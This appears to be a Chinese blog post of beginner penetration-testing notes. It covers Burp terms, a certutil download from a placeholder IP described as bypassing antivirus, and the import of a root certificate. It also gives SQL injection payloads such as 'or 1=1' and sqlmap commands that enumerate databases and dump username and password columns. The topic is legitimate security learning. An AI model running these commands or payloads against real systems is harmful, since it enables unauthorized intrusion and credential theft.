侧边栏壁纸
博主头像
fynn博主等级

我们应该有恒心,尤其是要有自信心,必须相信自己是有能力的,而且要不惜任何代价把这种能力发挥出来。

  • 累计撰写 51 篇文章
  • 累计创建 21 个标签
  • 累计收到 0 条评论

目 录CONTENT

文章目录

渗透测试文档

fynn
2023-01-16 / 0 评论 / 3 点赞 / 254 阅读 / 816 字 / 正在检测是否收录...

Burp抓包工具

  • 单词意思
proxy 代理 工具中是代理抓包
history 历史记录
options 选项 或者 设置
import 导入
export 导出
request 请求信息
response 返回信息

Windows 证书导入命令

下载文件

  • 执行两次绕过杀软下载文件
certutil
certutil -urlcache -split -f http://ip/artifact.exe

导入证书到根证书颁发机构

certutil.exe -addstore -f "Root" D:/ca.der

认识注入

? 标记后面的内容为url参数
& 拼接多个参数
' 或者 " SQL语句中 闭合
; 结束sql语句
select 选择
from 指向
where 条件
and 并且
or 或者
# sql语句中注释 不会执行
-- 注释
select * from user; 查询user表所有数据
select * from user where id=1; 查询表中id字段内容为1的数据
select * from user wehre id=1 and username='root'; 查询条件 id=1并且用户名为root
select * from user where id=1 or username='root'; 查询条件 id=1或者用户名为root

注入语句

正常语句:select * from user where id=1; 这个1是url传递过来的 ?uid=1
注入语句:select * from user where id=1 or 1=1; id=后面的内容是url传递的
例如:?uid=1 or 1=1
这条语句 1=1 表示为真 id=1 如果数据中存在则为真,不存在为假。
为条件为真才会返回数据,加入或者条件,第一个条件为真返回id=1的数据,第二个条件为真返回所有数据。

正常语句:select * from user where username='root'; ?uname=root
注入语句:select * from user where username='root' or 1=1;#' ?uname=root ' or 1=1; #
这里'root' 代表字符串,传入' 是闭合字符串,# 注释后面的' 避免sql语句报错

sqlmap 使用

  • 程序是用python编程语言编写
  • python 是脚本解释器
python sqlmap.py --help #查询帮助文档
  • 单词意思
batch 执行默认选项
level 等级
risk 探测风险等级
random-agent 随机user-agent 
-r  读取文件 read
file.txt 保存请求包的文件
current 当前
user 用户
db 数据库 加s 代表多个 全称database
table 数据表
column 表中的 列名

常用命令

测试注入
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt

查询当前网站数据库所使用的用户
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt --current-user
如果是root权限的数据库可以获取所有数据

查询当前网站使用的数据库
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt --current-db

查询所有数据库
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt --dbs

查询所有某个数据库所有表 例如查询数据库 mysql 中所有表
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt -D mysql --tables

根据表名查询所有列名字段
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt -D mysql -T user --cloumns 

查询表中所有数据
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt -D mysql -T user  --dumps

查询表中某几个字段的数据
python sqlmap.py --batch --level=5 --risk=3 --random-agent -r file.txt -D mysql -T user -C username,password --dumps

文件上传

XSS打cookie 钓鱼

XXE 注入

3

评论区